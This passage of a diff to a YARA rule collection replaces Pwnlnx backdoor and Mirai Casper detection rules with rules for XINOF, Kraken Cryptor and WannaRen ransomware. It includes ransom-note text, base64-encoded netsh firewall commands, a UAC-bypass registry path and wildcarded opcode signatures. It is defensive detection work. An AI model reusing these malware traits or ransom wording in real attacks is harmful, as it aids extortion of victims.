90B8????????4881??????????5BC9C3554889??534881??????????4889??????????E8????????4889??E8????????C7????????????488B??????????8B????89????488B??????????8B??89????488B??????????8B????89????8B????8B????BA????????89??89??E8????????89????83??????0F84????????488D????BA????????BE????????4889??E8????????C7????????????C7????????????8B????89????488B????4889????488B????4889??????488B????4889??????E8????????89????488D????BE????????4889??E8????????488D????8B????BA????????4889??89??E8????????85??0F84????????488D??????????4889??E8????????488D??????????BE????????4889??E8????????488D??????????8B????BA????????4889??89??E8????????85??0F84????????488D????8B????BA????????4889??89??E8????????85??74??488D????BE????????4889??E8????????8B????488B????4889????488B????4889??????488B????4889??????E8????????39??75??8B????83????75??8B????488B????4889????488B????4889??????488B????4889??????89??E8????????EB??90EB??90EB??90EB??90EB??908B????89??E8????????B8????????4881??????????5BC9C390554889??4889????89????C7????????????488B????4889????C7????????????EB??488B????0FB6??8B????89??C1????F7????89??48980FB6??????????89??31??488B????88??83??????4883??????8B????3B????7C??488B????C9C3554889??4889????89????488B????4889????C7????????????EB??488B????0FB6??0FB6??????????31??488B????88??83??????4883??????8B????3B????7C??488B????C9C39090554889??534881??????????89??????????48C7????????????48C7????????????48C7????????????8B????89??488D??????????8B??????????4889??89??E8????????85??0F84????????8B????89??488D??????????89??4889??E8????????488D??????????488D??????????4889??4889??E8????????BA????????488D??????????488D??????????BE????????4889??B8????????E8????????488D??????????4889??E8????????4883????4889??E8????????4889????4883??????0F84????????488D??????????488B????4889??4889??E8????????488D??????????488D????B9????????BA????????4889??4889??E8????????89????83??????0F8E????????C7????????????E9????????488B????8B????4863??48C1????4801??488B??488D????BA????????488D??????????488D??????????4989??BE????????4889??B8????????E8????????488D??????????488D??????????4889??4889??E8????????85??0F85????????48C7????????????48C7????????????488D??????????4883????4889??E8????????4889??E8????????488B??????????8B??????????4189??4181??????????8B??????????89??81??????????488B????8B????4863??48C1????4801??488B??488D????BA????????488D??????????4889??????4889??????488B????4889??????488B????4889????4589??4189??4889??BE????????4889?? }
+		$s1 = "XINOF.exe" nocase ascii
+		$s2 = "C:\\Users\\Phoenix" nocase ascii
+		$s3 = "How To Decrypt Files.hta" nocase ascii
+		$s4 = "C:\\ProgramData\\norunanyway" nocase ascii
+		$s5 = "C:\\ProgramData\\clast" nocase ascii
+		$s6 = "fonix1" nocase ascii
+		$s7 = "C:\\Windows\\System32\\shatdown.exe" nocase ascii
+		$s8 = "XINOF Ransomw" nocase ascii
+		$s9 = "XINOF v4.2" nocase ascii
+		$s10 = "XINOF Ransomware Version 3.3" nocase ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 1000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 5 of ( $s* ) or TRELLIX_ARC_Ransom_Xinof_Chunk_PRIVATE
 }
-rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_3 : BACKDOOR FILE
+rule TRELLIX_ARC_Kraken_Cryptor_Ransomware_Loader : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the backdoor pwnlnx variant"
+		description = "Rule to detect the Kraken Cryptor Ransomware loader"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "02ea1eb2-7235-5ed5-86ba-19d52e8fb428"
-		date = "2020-04-17"
+		id = "e6bfa30b-6565-5d03-8f4d-96fc2b6a1c11"
+		date = "2018-09-30"
 		modified = "2020-08-14"
-		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L67-L97"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Kraken.yar#L1-L30"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "08f29e234f0ce3bded1771d702f8b5963b144141727e48b8a0594f58317aac75"
-		logic_hash = "8a1405f430ce57810577f65ef43a1425601bf49b5adb4f6f935505427ad9dc94"
+		hash = "564154a2e3647318ca40a5ffa68d06b1bd40b606cae1d15985e3d15097b512cd"
+		logic_hash = "9e252a3ba7f6bf861ea7563461a1420959dfb0f5b7c3f6071150d03422504539"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Pwnlnx"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Kraken"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$bp = { 7F??4C4602??01??000000000000000002??3E????0000000004??00000000??????000000000000B0??3A??000000000000000040??????????????????????01??000005????????0000000000000000??????0000000000004000000000????????????0000????????????00000000????00000000????0000????0000????A40C??00000000C0??????????????C0??????????????5013??00000000????????????00000000????00000000??????000004??00005801??00000000??????4000000000??????4000000000????000000000000????000000000000??????000000000000070000??????0000C0??????????????C0??????????????C0??????????????28??00000000000078??00000000000008??00000000000051E5??64??000000000000000000000000000000000000000000000000000000000000000000000000000000000000????000000000000??????000010??000001??0000474E5500000000????0000??????000000000000C0????????????????????????0000????84????00000000C8??????0000000025????????0000????374200000000????A56C00000000????????????0000????????????0000????A56C00000000????????????0000??????4200000000????A56C00000000????????????0000????24??00000000????A56C00000000????????????0000????????????0000????A56C00000000????????????0000????83??????0000????A56C00000000????????????0000????5E42000000000000A66C00000000????????????0000??????4200000000????A66C00000000????????????0000????914200000000????A66C00000000????????????0000??????4200000000????A66C00000000????????????0000????????????0000????A66C00000000????????????0000????????????0000????A66C00000000????????????0000??????4200000000????A66C00000000????????????0000??????4200000000??????EC08??4301??????62??0000E8????????4883????C3FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????00000000000000000000000000000000000000000000000031??4989??5E4889??4883????505449C7??????????48C7??????????48C7??????????E8????????F490904883????488B??????????4885??74??FF??4883????C390909090909090909090909090B8????????55482D????????4883????4889??76??B8????????4885??74??5DBF????????FF??660F1F????????????5DC366666666????????????????????BE????????554881??????????48C1????4889??4889??48C1????4801??48D1??74??B8????????4885??74??5DBF????????FF??0F1F??5DC3660F1F??????80????????????75??554889??53BB????????4881??????????4883????488B??????????48C1????4883????4839??73??660F1F??????4883????4889??????????FF????????????488B??????????4839??72??E8????????B8????????4885??74??BF????????E8????????C6????????????4883????5B5DF3??669055B8????????4885??4889??74??BE????????BF????????E8????????BF????????4883????75??5DE9????????6690B8????????4885??74??FF??EB??9090554889??534881??????????89??????????48C7????????????8B????3D????????76??E9????????8B????89??488D??????????8B??????????4889??89??E8????????85??75??E9????????8B????89??488D??????????89??4889??E8????????488D??????????BE????????4889??E8????????4889????4883??????75??E9????????488D??????????488D??????????4889??4889??E8????????85??74??E9????????488B??????????4889????C7????????????488B????89????488B????48C1????89????4883????FF????FF????FF????E8????????4883????89????BE????????488D????E8????????8B??????????BA????????488D????89??E8????????85??75??E9????????8B??????????BA????????488D????89??E8????????85??75??E9????????BE????????488D????E8????????8B????4883????FF????FF????FF????E8????????4883????39??74??E9????????8B????89??48C1????4889??8B????89??4801??4889????488B????488B????BA????????4889??4889??E8????????488B????4889????EB??488B????488D??????????4889??BA????????BE????????4889??E8????????89????83??????7F??EB??8B????488D??????????89??4889??E8????????8B????4863??488D??????????8B??????????4889??89??E8????????85??75??EB??8B????48984801????488B????483B????7C??488B????4889??E8????????B8????????488B????C9C3554889??534881??????????4889??????????E8????????4889??E8????????C7????????????488B??????????8B????89????488B??????????8B??89????488B??????????8B????89????8B????8B????BA????????89??89??E8????????89????83??????75??E9????????488D????BA????????BE????????4889??E8????????C7????????????C7????????????8B????89????4883????FF????FF????FF????E8????????4883????89????488D????BE????????4889??E8????????488D????8B????BA????????4889??89??E8????????85??75??E9????????488D??????????4889??E8????????488D??????????BE????????4889??E8????????488D??????????8B????BA????????4889??89??E8????????85??75??EB??488D????8B????BA????????4889??89??E8????????85??75??EB??488D????BE????????4889??E8????????8B????4883????FF????FF????FF????E8????????4883????39??74??EB??8B????83????74??EB??8B????4883????FF????FF????FF????89??E8????????4883????908B????89??E8????????B8????????488B????C9C3554889??4889????89????C7????????????488B????4889????C7????????????EB??488B????0FB6??8B????99F7????89??48980FB6??????????31??89??488B????88??83??????4883??????8B????3B????7C??488B????5DC3554889??4889????89????488B????4889????C7????????????EB??488B????0FB6??0FB6??????????31??488B????88??83??????4883??????8B????3B????7C??488B????5DC39090554889??534881??????????89??????????48C7????????????48C7????????????48C7????????????8B????89??488D??????????8B??????????4889??89??E8????????85??75??E9????????8B????89??488D??????????89??4889??E8????????488D??????????488D??????????4889??4889??E8????????488D??????????488D??????????4889??BA????????BE????????4889??B8????????E8????????488D??????????4889??E8????????4883????4889??E8????????4889????4883??????75??E9????????488D??????????488B????4889??4889??E8????????488D????488D??????????B9????????BA????????4889??E8????????89????83??????0F8E????????C7????????????E9????????488B????8B????4863??48C1????4801??488B??488D????488D??????????488D??????????4989??4889??BA????????BE????????4889??B8????????E8????????488D??????????488D??????????4889??4889??E8????????85??0F85????????48C7????????????48C7????????????488D??????????4883????4889??E8????????4889??E8????????4989??488B??????????8B??????????25????????89??8B??????????25????????89??488B????8B????4863??48C1????4801??488B??488D????488D??????????415052FF????FF????4189??4189??BA????????BE????????4889??B8????????E8????????4883????488B????4889??E8????????4889??488D?????????? }
+		$pdb = "C:\\Users\\Krypton\\source\\repos\\UAC\\UAC\\obj\\Release\\UAC.pdb" fullword ascii
+		$s2 = "SOFTWARE\\Classes\\mscfile\\shell\\open\\command" fullword wide
+		$s3 = "public_key" fullword ascii
+		$s4 = "KRAKEN DECRYPTOR" ascii
+		$s5 = "UNIQUE KEY" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 4000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and $pdb or all of ( $s* )
 }
-rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_4 : BACKDOOR FILE
+rule TRELLIX_ARC_Kraken_Cryptor_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the backdoor pwnlnx variant 4"
+		description = "Rule to detect the Kraken Cryptor Ransomware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "199bb534-f0f6-5b67-aedd-3eada5e45cc6"
-		date = "2020-04-17"
+		id = "7e1e5fa8-6d87-5e64-a8d4-4dae55ab76ca"
+		date = "2018-09-30"
 		modified = "2020-08-14"
-		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L99-L129"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Kraken.yar#L32-L64"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "2590ab56d46ff344f2aa4998efd1db216850bdddfc146d5d37e4b7d07c7336fc"
-		logic_hash = "11203beee446aaf0783d3a8d3839a88ef16c27d52be8670d650ebf6a1de2c3aa"
+		hash = "564154a2e3647318ca40a5ffa68d06b1bd40b606cae1d15985e3d15097b512cd"
+		logic_hash = "2ad7f0bf6110eab79e0f9541c49ae44089ebca3f91ffa80de874d60d5a7ed266"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Pwnlnx"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Kraken"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$bp = { 7F??4C4602??01??000000000000000001??3E????000000000000000000000000000000000000????????????000000000000??????0000000040??????????????000014??000003??0000474E55????9FECFBE5??F973??EB??2A??????????71??BD????????0000000000000000554889??53E8????????FF????????????4889??4889??4881??????????FF????????????4889??5BC9C30F1F??????554889??E8????????FF????????????C9C366666666????????????????????554889??E8????????4885??74??4C8B????4D85??74??65??8B????????????8B??????????4889??????????48C7??????????89??C1????C1????01??25????????29??48984C89????????????FF??????????C9C3660F1F????????????31??C9C36666662E????????????????554889??E8????????4889??????????48C7??????????FF??????????C9C390554889??E8????????8B??????????488B??????????488D????0FB6????3C??400F94??3C??410F94??74??4084??75??B8????????C9C30F1F????????????8B??????????39????74??3B????74??4584??74??8B??????????4801??0FB7??????????66????74??66??????75??4889??41FF??B8????????C9C30F1F??4084??74??8B??????????4801??0FB7??????????66????75??EB??0F1F????554889??534883????E8????????31??4889??31??E8????????483D????????77??4885??74??488B????488B????488B????488B????4889??????????31??4889??E8????????31??4883????5BC9C383????EB??662E0F1F????????????554889??415453E8????????4989??4889??31??31??E8????????483D????????77??488B????31??4889??488B????488B????488B????488B??????????4989????4889??????????E8????????31??5B415CC9C383????EB??0F1F??????554889??534883????E8????????31??4889??31??E8????????483D????????77??4885??74??488B????488B????488B????488B????4889??????????31??4889??E8????????31??4883????5BC9C383????EB??662E0F1F????????????554889??415453E8????????4989??4889??31??31??E8????????483D????????77??488B????31??4889??488B????488B????488B????488B??????????4989????4889??????????E8????????31??5B415CC9C383????EB??0F1F??????554889??534883????E8????????31??4889??BE????????E8????????483D????????77??4885??74??488B????4889????31??4889??E8????????31??4883????5BC9C383????EB??660F1F??????554889??415453E8????????4989??4889??BE????????31??E8????????483D????????77??488B????31??4889??488B????4989????488B????4889????E8????????31??5B415CC9C383????EB??554889??4157415641554154534883????E8????????4889??488D????4989??4189??4889??BA????????4989??4489????4D89??E8????????488B??????????448B????4881??????????488D????75??EB??0F1F????488B????4881??????????488D????74??0FB7????4839??75??4883????31??5B415C415D415E415FC9C30F1F??????4D89??4C89??4489??4889??4C89??FF??????????4883????5B415C415D415E415FC9C30F1F????554889??4157415641554154534883????E8????????65??8B????????????4889????4889????4189??8B??????????4889??B9????????48C7??????????4889??4D89??4589??89??C1????C1????01??25????????29??F3A648984C8B????????????0F84????????B9????????48C7??????????4889??F3A60F84????????31??4585??4889??4889????4489????74??418D??????31??488D??????0FB6??4883????4889??48C1????48C1????4801??4801??4839??488D????488D????75??89????488D????4C89??E8????????4885??4889??0F84????????488B????4885??74??81????????????0F84????????488B??????????483D????????4C8D????75??EB??0F1F??????498B????483D????????4C8D????74??498B??4889??E8????????85??75??31??4883????5B415C415D415E415FC9C34589??4D89??488B????4489??4889??488B????FF??????????4883????5B415C415D415E415FC9C30F1F??????????81????????????0F85????????31??EB??488D????4C89??E8????????4885??4889??74??498B????488B??????????488B????4885??74??31??4889??4889????FF??4885??488B????0F84????????31??E9????????0F1F????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??534883????E8????????89??488B??????????4881??????????488D????74??66??????75??EB??0F1F????66??????74??488B????483D????????488D????4889??75??4883????5BC9C3E8????????4889??E8????????4883????5BC9C36666662E????????????????554889??41554154534883????E8????????4C8B??????????4989??4981??????????498D??????75??EB??0F1F????4C8B????4981??????????498D??????74??488B??4C89??E8????????85??75??4C89??E8????????488B??E8????????4889??E8????????4883????5B415C415DC9C36666662E????????????????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889??534883????E8????????488B??????????BA????????89??BF????????E8????????4885??74??66????488B??????????488D????48C7??????????E8????????4883????5BC9C30F1F????554889?? }
+		$s1 = "Kraken Cryptor" fullword ascii nocase
+		$s2 = "support_email" fullword ascii
+		$fw1 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iU01CIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD00" ascii
+		$fw2 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iUkRQIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD0z" ascii
+		$fw3 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iUkRQIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD0z" ascii
+		$fw4 = "L0MgbmV0c2ggYWR2ZmlyZXdhbGwgZmlyZXdhbGwgYWRkIHJ1bGUgbmFtZT0iU01CIFByb3RvY29sIEJsb2NrIiBwcm90b2NvbD1UQ1AgZGlyPWluIGxvY2FscG9ydD00" ascii
+		$uac = "<!--<requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\" />-->   " fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 400KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and all of ( $fw* ) or all of ( $s* ) or $uac
 }
-rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_6 : BACKDOOR FILE
+rule TRELLIX_ARC_Ransom_Note_Kraken_Cryptor_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the backdoor pwnlnx variant 6"
+		description = "Rule to detect the ransom note delivered by Kraken Cryptor Ransomware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "56bfe9c7-4cd4-51f6-a469-da8af52d64c2"
-		date = "2020-04-17"
+		id = "dec9d364-daf9-5a1d-8e72-ed4dd2aeecdf"
+		date = "2018-09-30"
 		modified = "2020-08-14"
-		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L131-L161"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/fallout-exploit-kit-releases-the-kraken-ransomware-on-its-victims/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_Kraken.yar#L66-L108"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "d29254ab907c9ef54349de3ec0dd8b22b4692c58ed7a7b340afbc6e44363f96a"
-		logic_hash = "29423135a46ee7b9aa1bd8f1e6f7ffad09725787ad6e75312e1d34b18e3917d4"
+		logic_hash = "d4acdf0716320b0f757b8dbc97bb9d407460b2d69dc8e12292539e823be0f57d"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Pwnlnx"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Kraken"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$bp = { 7F??4C4602??01??000000000000000001??3E????000000000000000000000000000000000000??????09??00000000000000004000000000??????2B??28??04??000014??000003??0000474E55????4D9585????AB6522????52AD3B??EC9B4BE8????????0000000000000000????00000000554889??????????4889??41544989??534889??488B??????????E8????????4C89??4889??48C7??????????FF??????????488B??????????89??E8????????89??5B415C5DC30F1F??E8????????554889??????????4889??41544989??534889??488B??????????E8????????4C89??4889??48C7??????????FF??????????488B??????????89??E8????????89??5B415C5DC30F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??415541544989??534889??4883????488B??????????65??8B????????????4889????31??E8????????4889??4C89??FF??????????488B??????????4189??E8????????488B??????????483D????????488D????75??EB??0F1F??????488B????4881??????????488D????74??0FB7??488D????48C7??????????31??E8????????498B????498B??????488D????488D????????????BA????????E8????????4885??74??4981??????????????488B????65??33????????????4489??75??4883????5B415C415D5DC3E8????????0F1F??E8????????554889??41574589??415641554189??4154534889??4883????488B??????????4889????4889????4C89????483D????????4C8D????74??4C63??EB??0F1F??????498B????483D????????4C8D????74??498B??4C89??4889??E8????????85??75??4883????5B415C415D415E415F5DC30F1F??????????4589??4C8B????488B????4489??4889??488B????FF??????????4883????5B415C415D415E415F5DC3660F1F??????E8????????554889??41574589??41564D89??41554989??41544189??BA????????534889??488D????4883????4889????4889??65??8B????????????4889????31??E8????????488B??????????4881??????????488D????74??0FB7????4839??75??EB??0F1F????????????410FB7????4839??74??4C8B????4981??????????498D????75??4589??4D89??4C89??4489??4889??488B????FF??????????488B????65??33????????????75??4883????5B415C415D415E415F5DC3660F1F??????31??EB??E8????????0F1F??????662E0F1F????????????E8????????55BF????????4889??4881??????????65??8B????????????4889????31??488D??????????FF????????????B9????????4889??488D??????????F3??A5488D??????????48C7??????????BE????????B1??E8????????4885??74??48BA???????? }
+		$s1 = "No way to recovery your files without \"KRAKEN DECRYPTOR\" software and your computer \"UNIQUE KEY\"!" fullword ascii
+		$s2 = "Are you want to decrypt all of your encrypted files? If yes! You need to pay for decryption service to us!" fullword ascii
+		$s3 = "The speed, power and complexity of this encryption have been high and if you are now viewing this guide." fullword ascii
+		$s4 = "Project \"KRAKEN CRYPTOR\" doesn't damage any of your files, this action is reversible if you follow the instructions above." fullword ascii
+		$s5 = "https://localBitcoins.com" fullword ascii
+		$s6 = "For the decryption service, we also need your \"KRAKEN ENCRYPTED UNIQUE KEY\" you can see this in the top!" fullword ascii
+		$s7 = "-----BEGIN KRAKEN ENCRYPTED UNIQUE KEY----- " fullword ascii
+		$s8 = "All your files has been encrypted by \"KRAKEN CRYPTOR\"." fullword ascii
+		$s9 = "It means that \"KRAKEN CRYPTOR\" immediately removed form your system!" fullword ascii
+		$s10 = "After your payment made, all of your encrypted files has been decrypted." fullword ascii
+		$s11 = "Don't delete .XKHVE files! there are not virus and are your files, but encrypted!" fullword ascii
+		$s12 = "You can decrypt one of your encrypted smaller file for free in the first contact with us." fullword ascii
+		$s13 = "You must register on this site and click \"BUY Bitcoins\" then choose your country to find sellers and their prices." fullword ascii
+		$s14 = "-----END KRAKEN ENCRYPTED UNIQUE KEY-----" fullword ascii
+		$s15 = "DON'T MODIFY \"KRAKEN ENCRYPT UNIQUE KEY\"." fullword ascii
+		$s16 = "# Read the following instructions carefully to decrypt your files." fullword ascii
+		$s17 = "We use best and easy way to communications. It's email support, you can see our emails below." fullword ascii
+		$s18 = "DON'T USE THIRD PARTY, PUBLIC TOOLS/SOFTWARE TO DECRYPT YOUR FILES, THIS CAUSE DAMAGE YOUR FILES PERMANENTLY." fullword ascii
+		$s19 = "https://en.wikipedia.org/wiki/Bitcoin" fullword ascii
+		$s20 = "Please send your message with same subject to both address." fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 700KB and all of them
+		uint16( 0 ) == 0x4120 and filesize < 9KB and all of them
 }
-rule TRELLIX_ARC_Mirai_Casper_Variant : BACKDOOR FILE
+rule TRELLIX_ARC_Wannaren_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the Mirai Casper variant"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "0f3a028c-9514-51cd-ad82-415e8ac2dee7"
-		date = "2020-04-17"
-		modified = "2020-08-14"
-		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L163-L193"
+		description = "Rule to detect WannaRen Ransomware"
+		author = "McAfee ATR Team"
+		id = "f4f30d12-547d-5044-a4e5-b88bf359480f"
+		date = "2020-04-25"
+		modified = "2020-10-12"
+		reference = "https://blog.360totalsecurity.com/en/attention-you-may-have-become-a-susceptible-group-of-wannaren-ransomware/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_wannaren.yar#L1-L34"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "57cc422a6a90c571198a2d1c3db13c31fbdb48ba2f0f4356846d6d636d0f9300"
-		logic_hash = "5449d1ef0c4977c6151fc194ad5f526b6be414c1efb7fd4bacb77d4bcd89c703"
+		hash = "7b364f1c854e6891c8d09766bcc9a49420e0b5b4084d74aa331ae94e2cfb7e1d"
+		logic_hash = "0feb913b84eb0ecdda688f0cf0a5051798fe4fbce8a6ea959825985a81a6699c"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Pwnlnx"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/WannaRen"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$bp = { 7F??4C4601??01??000000000000000002??03??01??0000E0??04??34??000088??????????000034??20??05????????????????000000000000000080??????80??????15????????0C??05????????10??????0000??????0C??40A510??40A510??80??????904A0000060000000010????????0000D4??0000D4??04??D4??04??440000??????????????000004??0000070000??????0C??40A510??40A510??14??000030??000004??000004??000051E5??64????000000000000000000000000000000000000060000??????000004??000010??000001??0000474E5500000000????0000????0000????0000??????000014??000003??0000474E55??????3A??87????529723????2C??08??????AB35????????2A??0000BC????????0000????A510??2A??0000C4??????????0000C8??????2A??0000CCA510??2A??00005589??5383????E8????????5B81??????????8B??????????85??74??E8????????E8????????E8????????585BC9C3FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????000000000000000031??5E89??83????50545268????????68????????515668????????E8????????F490909090909090909090909090905589??538D??????80????????????75??BB????????A1????????81??????????C1????83????39??73??908D??????83????A3????????FF????????????A1????????39??72??B8????????85??74??C7????????????E8????????C6????????????8D??????5B5DC3908D??????55B8????????89??8D??????E8????????5A81??????????85??74??89??????C7??????????????C7??????????????C7????????????E8????????A1????????85??74??B8????????85??74??C7????????????FF??C9C39090905589??83????8B????88????A1????????85??74??A1????????0FB6????88??83????A3????????EB??C7??????????????8D????89??????C7????????????E8????????C9C35589??83????EB??8B????0FB6??0FBE??83??????89????E8????????8B????0FB6??84??75??C9C35589??83????8B????0FB6??88????83??????80??????0F84????????80??????74??0FBE????89????E8????????E9????????C7????????????8B????0FB6??88????83??????80??????75??C7????????????8B????0FB6??88????83??????EB??80??????75??C7????????????8B????0FB6??88????83??????C7????????????EB??8B????89??C1????01??01??89??0FBE????8D????83????89????8B????0FB6??88????83??????80??????7E??80??????7E??80??????74??80??????75??83??????8B????0FB6??88????83??????80??????0F84????????0FB6????88????80??????7E??0FB6????83????88????0FBE????83????83????0F87????????8B????????????FF??8B????8D????89????8B??89????C7????????????EB??83??????8B????8B????8D????0FB6??84??75??EB??C7????????????E8????????8B????83????85??75??8B????3B????0F92??83??????84??75??8